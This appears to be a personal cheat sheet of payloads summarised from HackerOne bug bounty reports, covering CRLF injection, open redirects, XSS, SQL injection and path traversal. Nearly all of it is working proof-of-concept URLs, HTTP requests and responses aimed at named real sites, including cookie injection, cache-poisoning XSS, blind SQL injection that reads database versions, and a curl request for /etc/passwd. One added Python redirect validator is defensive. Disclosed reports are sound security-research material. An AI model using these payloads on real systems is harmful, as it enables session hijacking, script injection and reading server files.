HackerOne Vulnerability Analysis 1





This document is my own summary of only the key payloads, based on many reports submitted to HackerOne.

Link : https://hackerone.com/





Vulnerabilities list

1. CRLF Injection
2. Open Redirection 
3. Cross-Site-Scripting
4. SQL-Injection
5. Path Traversal








CRLF Injection

PoC
http://www.myshopify.com/xxcrlftest%0aSet-Cookie:test=test3;domain=.myshopify.com;
https://www.blackfan.myshopify.com/xxx%0aSet-Cookie:test=test2;domain=.myshopify.com;
HTTP Response:
HTTP/1.1 302 Moved Temporarily
...
Location: http://myshopify.com/xxcrlftest
Set-Cookie:test=test;domain=.myshopify.com;

PoC:
https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com
HTTP Response:
HTTP/1.1 301 Moved Permanently
...
Location: http://engineeringblog.yelp.com/xxcrlftest
Set-Cookie: test=test;domain=.yelp.com

PoC
(Chrome, Internet Explorer)
http://gratipay.com/%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
HTTP Response:
Location: https://gratipay.com/\r
Set-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;\r\n

PoC
https://s.mail.ru/test%0dSet-Cookie:crlf=injection;domain=.mail.ru;

PoC
https://corp.mail.ru/%0dSet-Cookie:crlf=injection;domain=.mail.ru;

PoC
http://my.mail.ru/crlftest%0dSet-Cookie:crlf=inj6;domain=.mail.ru;path=/;/
http://m.my.mail.ru/crlftest%0dSet-Cookie:crlf=inj4;domain=.mail.ru;path=/;/
https://mir.mail.ru/crlftest%0dSet-Cookie:crlf=inj3;domain=.mail.ru;path=/;/
https://blog.mail.ru/crlftest%0dSet-Cookie:crlf=inj5;domain=.mail.ru;path=/;/
https://blogs.mail.ru/crlftest%0dSet-Cookie:crlf=inj7;domain=.mail.ru;path=/;/
https://www.video.mail.ru/crlftest%0dSet-Cookie:crlf=inj2;domain=.mail.ru;path=/;/

PoC
http://doc.owncloud.org/%23%0dSet-Cookie:crlf=injection;domain=.owncloud.org;
HTTP Response:
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 07:58:47 GMT\r\n
Server: Apache\r\n
Location: https://doc.owncloud.org/#\r                      < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n

PoC
https://api.owncloud.org/%23%0dSet-Cookie:crlf=injection2;domain=.owncloud.org;
HTTP Response:
HTTP/1.1 301 Moved Permanently\r\n
Date: Wed, 27 Jul 2016 10:28:01 GMT\r\n
Server: Apache\r\n
Strict-Transport-Security: max-age=63072000\r\n
X-Xss-Protection: 1; mode=block\r\n
Location: https://doc.owncloud.org/api/#\r                       < injection \r
Set-Cookie:crlf=injection;domain=.owncloud.org;\r\n

PoC
https://touch.lady.mail.ru/%0aSet-Cookie:csrftoken=x;domain=.mail.ru;
HTTP Response:
HTTP/1.1 301 Moved Permanently
...
Location: https://lady.mail.ru/
Set-Cookie:csrftoken=x;domain=.mail.ru;

PoC (for any browser other than Firefox):
https://monitor.sjc.dropbox.com/crlf%0dSet-Cookie:test=test;domain=.dropbox.com
HTTP Response:
HTTP/1.1 301 Moved Permanently\r\n
Date: Sat, 13 Dec 2014 10:05:12 GMT\r\n
Server: Apache\r\n
Location: https://monitor.dropbox.com//crlf/r < injection
Set-Cookie:test=test;domain=.dropbox.com\r\n

Result:
Creating a cookie-param "test=test" on *.dropbox.com

PoC 
http://greenhouse.io/%0d%0aSet-Cookie:test=test;domain=.greenhouse.io

PoC (any browser except Firefox):
http://account-global.ubnt.com/%3f%0dSet-Cookie:crlf=injection%3bdomain=.ubnt.com%3b
HTTP Response:
HTTP/1.1 302 Found
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 16 Jun 2016 09:59:15 GMT
Location: https://account-global.ubnt.com/index.html?         <= injection \r
Set-Cookie:crlf=injection;domain=.ubnt.com;

This vulnerability can be combined with others: for example, XSS via a cookie, session fixation, or bypassing Double-Submit Cookie CSRF protection.

PoC (Firefox)
http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
After the request is sent through Firefox, it is saved in the cache, and with a small trick it can be made to work in another browser.
PoC (Chrome)
Make sure you send this request after the Firefox one, and that the previous HTTP response contained the header X-Cache: HIT
http://newscdn.starbucks.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
HTTP Response
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://news.starbucks.com/
Content-Length:35
X-XSS-Protection:0

23
<svg onload=alert(document.domain)>
0

Chrome PoC


http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
Firefox PoC
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
HTTP Response
HTTP/1.1 301 Content-moved
Date: Tue, 20 Dec 2016 08:40:11 GMT
Server: WebServer
X-Original-link: /%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
X-XSS-Protection: 0
Location: //x:1
Content-Type: text/html
Content-Length: 98

<script>alert(document.domain)</script>
Content-Length: 0
X-OneLinkServiceType: onelink.fcgi






Open Redirection 


PoC
https://giwi.com/main.action#//google.com/

PoC
https://skyliner.io//blackfan.ru/
https://qa.skyliner.io//blackfan.ru/
HTTP Response
HTTP/1.1 301 Moved Permanently
Content-Length: 0
Connection: close
Date: Wed, 24 Aug 2016 17:30:39 GMT
Location: //blackfan.ru

PoC
http://rabota.mail.ru//blackfan.ru//
HTTP Response:
HTTP/1.1 301 Moved Permanently
Server: nginx/1.7.10
Date: Mon, 07 Sep 2015 07:24:30 GMT
Content-Length: 0
Connection: keep-alive
Keep-Alive: timeout=60
Location: //blackfan.ru

PoC
Reproduction Steps:
https://m.uber.com//youtube.com/%2F..
HTTP Response:
HTTP/1.1 303 See Other
...
Location: //youtube.com/%2F../

PoC
Unauthenticated users only (no Mpop cookie)
https://ml.money.mail.ru//blackfan.ru
HTTP Response
HTTP/1.1 302
...
Location: //blackfan.ru?dmr_refresh=1

PoC
http://zaption.com///www.google.com/%2f%2e%2e
HTTP/1.1 303 See Other
Location://www.google.com/%2f%2e%2e

PoC
https://apps.shopify.com//blackfan.ru/
HTTP Response
HTTP/1.1 301 Moved Permanently
Server: Cowboy
Date: Wed, 17 Aug 2016 11:48:27 GMT
Connection: close
Location: //blackfan.ru




PoC

https://admin.c2fo.com///www.google.com/%2e%2e
HTTP Request:
GET ///www.google.com/%2e%2e HTTP/1.1
Host: admin.c2fo.com

HTTP Response:
Location: //www.google.com/%2e%2e/

PoC
Chrome, IE:
https://cooking.lady.mail.ru/%09/blackfan.ru

Chrome, IE, Firefox:
https://cooking.lady.mail.ru/%5cblackfan.ru
HTTP Response
HTTP/1.1 301 Moved Permanently
...
Location: / /blackfan.ru/
HTTP/1.1 301 Moved Permanently
...
Location: /\blackfan.ru/


PoC:
Open the link and wait for it to load fully
https://verkkopalvelu.lahitapiola.fi//blackfan.ru/%2f../e2/kotivakuutus/vakuutuslaskuri/

PoC
https://http2.cloudflare.com/%5cblackfan.ru
HTTP Response
HTTP/1.1 301 Moved Permanently
...
location: /\blackfan.ru/

PoC

https://keybase.io//www.google.com/%2f%2e%2e
HTTP Response:
HTTP/1.1 303 See Other
...
Location: //www.google.com/%2f%2e%2e/

PoC
https://dev.twitter.com/https:/%5cblackfan.ru/
HTTP Response:
HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru

Description: Open Redirect
Domain: idp.fr.cloud.gov
Steps To Reproduce:
Open URL:
https://idp.fr.cloud.gov//blackfan.ru/..;/css
HTTP Response
HTTP/1.1 302 Found
...
Location: //blackfan.ru/..;/css/
...
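
A server-side check for the redirect inputs shown in the CRLF Injection and Open Redirection sections above, as an added example that is not taken from any of the reports: it refuses control characters, backslashes and scheme-relative paths, and always emits an absolute Location on a fixed origin. CANONICAL_ORIGIN, the function names and the sample paths are assumptions made for the example.

```python
import re
from urllib.parse import quote, unquote

# Assumption for this example: the single origin the site redirects to.
CANONICAL_ORIGIN = "https://www.example.test"

# CR, LF, TAB and other control bytes: they split headers or are stripped by browsers
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def _decode_all(value, max_rounds=3):
    """Percent-decode until stable; None if the value is still changing after max_rounds."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return None


def check_redirect_path(raw_path):
    """Return why raw_path must not be echoed into Location, or None if it is safe."""
    path = _decode_all(raw_path)
    if path is None:
        return "over-encoded"
    if _CONTROL.search(path):
        return "control-char"      # %0d / %0a / %09 / %01 forms
    if "\\" in path:
        return "backslash"         # /%5chost: browsers read "\" as "/"
    if not path.startswith("/"):
        return "not-a-path"
    if path.startswith("//"):
        return "scheme-relative"   # //host leaves the origin
    return None


def build_location(raw_path):
    """Build the Location header line; unsafe paths fall back to the site root."""
    if check_redirect_path(raw_path) is None:
        # Re-encode so that nothing decoded reaches the header verbatim
        target = quote(unquote(raw_path), safe="/")
    else:
        target = "/"
    # Absolute URL on a fixed origin: the path cannot select another host
    return "Location: " + CANONICAL_ORIGIN + target


if __name__ == "__main__":
    # Constructed request paths modelled on the URL shapes listed above
    samples = [
        "/xxcrlftest%0d%0aSet-Cookie:%20test=test",
        "/%250dSet-Cookie:crlf=injection",
        "//attacker.example/%2f..",
        "/%5cattacker.example",
        "/%09/attacker.example",
        "/docs/getting%20started",
    ]
    for sample in samples:
        print(sample, "->", check_redirect_path(sample), "|", build_location(sample))
```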





Cross-Site-Scripting

PoC (Internet Explorer, Edge):


https://blackfan.ru/x?r=https://forum.owncloud.org/<svg/onload=alert(document.domain)>/%252e%252e

PoC (Internet Explorer):


http://blackfan.ru/x?r=http://support.my.com/"-alert(document.domain)-"/%252e%252e/games
HTTP Response:
   "continue":    "http://support.my.com/"-alert(document.domain)-"/%2e%2e/games",
   "signup_method":     "email,phone",
   "signup_continue":   "ht

PoC
Open in Internet Explorer
(A redirect bug is used to generate the correct request, so the "bf.am/x?r=" script is required)
http://bf.am/x?r=https://mrgs.mail.ru/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/
Result:
<input type="hidden" name="target" value="/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/">

PoC
http://blackfan.ru/x?r=http://odnoklassniki.ru%252f%253f%2523%22*alert(document.domain)*"
http://blackfan.ru/x?r=http://ok.ru%252f%253f%2523%22*alert(document.domain)*"
HTTP Response:


<script type="text/javascript">
...
host:"http://odnoklassniki.ru/?#"*alert(document.cookie)*""
...
</script>

PoC
http://bf.am/x?r=https://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/
Result:
<meta property="og:url" content="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" />
...
<div id="shareToolbox" class="b-likes__inner" data-url="http://tanks.mail.ru/"><svg/onload=alert(document.domain)>/%2e%2e/%2e%2e/" data-title="Страница не найдена - Ошибка 404

PoC
XSS for Internet Explorer
http://bf.am/x?r=https://strife.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://wf.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://aw.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://aa.mail.ru/xxx"><svg%0conload=alert%26lpar;document.cookie%26rpar;%26sol;/%252e%252e/
http://bf.am/x?r=https://pw.mail.ru/xxx"><svg/%252e%252e/onload=alert%26lpar;document.cookie%26rpar;>/%252e%252e/

PoC Internet Explorer
https://blackfan.ru/x?r=https://realty.mail.ru/%22--%3e%3csvg/onload=alert(document.domain)%3e/%252e%252e
Request
GET /"--><svg/onload=alert(document.domain)>/.. HTTP/1.1
Host: realty.mail.ru
Connection: close

PoC
https://apps.wordpress.com/support/&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
https://labs.spotify.com/&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
https://news.spotify.com/tr/&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;

PoC (Firefox):
https://pokerist.mail.ru/%3Cscript%3Ealert(document.domain)%3C/script%3E
https://pokerist.mail.ru/%3Csvg%20onload=alert(document.domain)%3E
HTTP Response:
<h1>Error 404</h1>
<p>Unable to resolve the request "<script>alert(document.domain)</script>".</p>
<h1>Error 404</h1>
<p>The system is unable to find the requested action "<svg onload=alert(document.domain)>".</p>

PoC
  1. <a href="//bf.am">Welcome</a> <-- <a> tag attack

PoC
https://controlsyou.quora.com/'-alert(document.domain)-'
HTTP Response
<script type="text/javascript">
...
ga('set', 'dimension1', 'board-'-alert(document.domain)-'');
ga('set', 'dimension2', 'False');
ga('set', 'dimension3', 'False');});});</script>

PoC
Open URL in Firefox:
https://theacademy.upserve.com/roles/?%22%3E%3Cscript//src=data&colon;,alert(location)//
HTTP Request
GET /roles/?%22%3E%3Cscript//src=data&colon;,alert(location)// HTTP/1.1
Host: theacademy.upserve.com
HTTP Response
<a class="category dropdown-item name-sort sorting-desc" href="/roles/?"><script//src=data&colon;,alert(location)//&orderby=name&order=DESC">Name</a>
<a class="category dropdown-item views-sort " href="/roles/?"><script//src=data&colon;,alert(location)//&orderby=views&order=DESC" >Views</a>
<a class="category dropdown-item duration-sort " href="/roles/?"><script//src=data&colon;,alert(location)//&orderby=duration&order=DESC">Duration</a>

PoC
Open URL in Internet Explorer.
This vulnerability only works in Internet Explorer (and possibly in Edge), since the Request-URI has to be sent without URL encoding, which is only possible in this browser via a redirect.
https://blackfan.ru/x?r=https://stage-go.wepay.com/%22onerror=%22alert(document.domain)%22/%252e%252e/index.php/%22/index.php
HTTP Request
GET /"onerror="alert(document.domain)"/%2e%2e/index.php/"/index.php HTTP/1.1
Host: stage-go.wepay.com
HTTP Response
<img src="https://stage-go.wepay.com/"onerror="alert(document.domain)"/%2e%2e/index.php/"/index.php/uploads/847_WePay_20170809-700.png" alt="Mans" class="hero--image"> 

PoC
https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
HTTP Response:
HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...


<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>.  If not click the link.

PoC (Internet Explorer and possibly Edge)
https://blackfan.ru/x?r=https://ibank.qiwi.ru/xx'-alert(document.domain)-'xx/%252e%252e/web_banking/session_timeout.jsf
blackfan.ru/x?r is a simple redirect script needed to form the Request-URI and bypass the IE XSS filter.
HTTP Response
    <script type="text/javascript">
//<![CDATA[
var lang='ru';var calendarStartYear='';var colorPickerImage="/web_banking/javax.faces.resource/color.png.jsf?ln=images";var contextPath='/xx'-alert(document.domain)-'xx/%2e%2e/web_banking';
//]]>
</script>

PoC
Open the link with Internet Explorer
https://blackfan.ru/x?r=https://contact-sys.com/xxx'-alert(document.domain)],<!--/%252e%252e
HTTP Request
GET /xxx'-alert(document.domain)],<!--/%2e%2e HTTP/1.1
Host: contact-sys.com
HTTP Response
<script type="text/javascript">var routes=['xxx\\'-alert(1)],<!--','%2e%2e'],


PoC (IE)

http://blackfan.ru/x?r=https://sms.qiwi.ru/bo/reset/"><svg/onload=alert(document.domain)>/%252e%252e/%252e%252e/


Open URL in Internet Explorer (tested on IE 11)
https://blackfan.ru/x?r=https://allhiphop.vanillacommunities.com/xxx%22-alert(document.domain)-%22xxx/%252e%252e/
blackfan.ru/x is a simple redirect script that is needed to send the request path without URL encoding.
HTTP Request
GET /xxx"-alert(123)-"xxx/%2e%2e/ HTTP/1.1
Host: allhiphop.vanillacommunities.com
HTTP Response
<script>
   COMSCORE.beacon({
      c1:2,
      c2:6685975,
      c3:"",
      c4:"app6.cl411.vanilladev.com/xxx"-alert(123)-"xxx/%2e%2e/",
      c5:"",
      c6:"",
      c15:""
   });
   </script>

HTTP Request
GET /?xx HTTP/1.1
Host: wknd.rocketbank.ru
X-Forwarded-Host: cacheattack'"><script>alert(document.domain)</script>


HTTP Response
         <link rel="next" href="http://cacheattack'"><script>alert(document.domain)</script>/friends/"> 
         <link rel="canonical" href="http://cacheattack'"><script>alert(document.domain)</script>/">  



     <meta content="203852619785949" property="fb:app_id" >
     <meta content="website" property="og:type" >
     <meta content="http://cacheattack'"><script>alert(document.domain)</script>/" property="og:url" >


HTTP Request
GET /?xx HTTP/1.1
Host: meta.discourse.org
X-Forwarded-Host: cacheattack'"><script>alert(document.domain)</script>
HTTP Response
<link rel="preload" 
   href="https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2?https://cacheattack'">
   <script>alert(document.domain)</script>
   &2&v=4.7.0" as="font" type="font/woff2" crossorigin />
<style>
  @font-face {
    font-family: 'FontAwesome';
    src: url('https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2?https://cacheattack'">
    <script>alert(document.domain)</script>
    &2&v=4.7.0') format('woff2'),
         url('https://d11a6trkgmumsb.cloudfront.net/assets/fontawesome-webfont-ba0c59deb5450f5cb41b3f93609ee2d0d995415877ddfa223e8a8a7533474f07.woff?https://cacheattack&#39;&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;&amp;2&v=4.7.0') format('woff');
  }
</style>





SQL-Injection

PoC
  1. TRUE: substr(version(),1,10) = 'PostgreSQL', result: Peruttu Ilmoittaumisesi
http://viestinta.lahitapiola.fi/webApp/sijoitustalous_peruutus?regId=253685182&locId=78976538+and+case+when+substr(version(),1,10)=%27PostgreSQL%27+then+true+else+cast(version()%20as%20numeric)=1+end
  2. FALSE: substr(version(),1,10) = 'PostgreXXX', result: An error occurred
http://viestinta.lahitapiola.fi/webApp/sijoitustalous_peruutus?regId=253685182&locId=78976538+and+case+when+substr(version(),1,10)=%27PostgreXXX%27+then+true+else+cast(version()%20as%20numeric)=1+end

PoC
POST /webApp/oma_conf HTTP/1.1
Host: viestinta.lahitapiola.fi
Content-Type: application/x-www-form-urlencoded
Content-Length: 1131

ctx=%3Cctx+lang%3D%22en%22+date%3D%222016-11-12T17%3A33%3A06Z%22+_target%3D%22web%22+webApp-id%3D%22235234841%22+_folderModel%3D%22nmsRecipient%22%3E%3CuserInfo+datakitInDatabase%3D%22true%22+homeDir%3D%22%22+instanceLocale%3D%22en-US%22+locale%3D%22en-US%22+login%3D%22webapp%22+loginCS%3D%22Web+applications+agent+%28webapp%29%22+loginId%3D%223290%22+noConsoleCnx%3D%22true%22+orgUnitId%3D%220%22+theme%3D%22%22+timezone%3D%22Europe%2FHelsinki%22+xmlns%3ASOAP-ENV%3D%22http%3A%2F%2Fschemas.xmlsoap.org%2Fsoap%2Fenvelope%2F%22+xmlns%3Ans%3D%22urn%3Axtk%3Asession%22+xmlns%3Axsd%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema%22+xmlns%3Axsi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXMLSchema-instance%22%3E%3Clogin-right+right%3D%22admin%22%2F%3E%3C%2FuserInfo%3E%3Ctimezone+current%3D%22Europe%2FHelsinki%22+changed%3D%22false%22%2F%3E%3Cvars%3E%3CcustomerId%3E0%3C%2FcustomerId%3E%3Caction%3Ein%3C%2Faction%3E
%3Cemail%3Etest%40test.ru' and substr(version(),1,10) = 'PostgreSQL' and '1%3C%2Femail%3E
%3C%2Fvars%3E%3CactivityHistory%3E%3Cactivity+name%3D%22page%22%2F%3E%3C%2FactivityHistory%3E%3C%2Fctx%3E&userAction=next&transition=
Steps to reproduce
  1. Open http://viestinta.lahitapiola.fi/webApp/oma_conf
  2. Fill in the form value ' and substr(version(),1,10) = 'PostgreSQL' and '1
  3. Result Kiitos tilauksestasi!
  4. Fill in the form value ' and substr(version(),1,10) = 'PostgreXXX' and '1
  5. Result An error occurred.

 ' and (@@version)=1 and '1'='1
HTTP Request
POST /index.php/LK/reset_password HTTP/1.1
Host: lk.contact-sys.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: session=rljb13keot8u1s09nqrf9f8be1; _ym_uid=1472633286349849091; _ym_isad=2; _ga=GA1.2.258776393.1472633287; LKlang=RU
Connection: close
Content-Length: 66

FP_POINT_CODE=test&FP_LK_USER_LOGIN=' and (@@version)=1 and '1'='1
HTTP Response
{"msg_code":-1,"msg_text":"\u041e\u0448\u0438\u0431\u043a\u0430 \u043f\u0440\u0435\u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f 
nvarchar \"Microsoft SQL Server 2014 (SP2) (KB3171021) - 12.0.5000.0 (X64)   Jun 17 2016 19:14:09   Copyright (c) Microsoft Corporation  Enterprise Edition: Core-based Licensing (64-bit) on Windows NT 6.3 <X64> (Build 9600: ) 
\" \u0432 \u0442\u0438\u043f \u0434\u0430\u043d\u043d\u044b\u0445 int"}

Vulnerable parameter: limit
POST█████ HTTP/1.1
Host: contact-sys.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 59

country_code=RU&send_rec_type=1&action=index&term=&limit=10+INTO+@A
Response
{"error":"SQLSTATE[21000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns","errorCode":"SQLSTATE[21000]: Cardinality violation: 1222 The used SELECT statements have a different number of columns"





Path Traversal

Description
Reading files outside the web root via path traversal
PoC
GET /..\..\..\..\..\..\..\..\..\..\..\..\..\..\etc\passwd HTTP/1.1
Host: dev-nightly.ubnt.com
curl "https://dev-nightly.ubnt.com/..\..\..\etc\passwd"
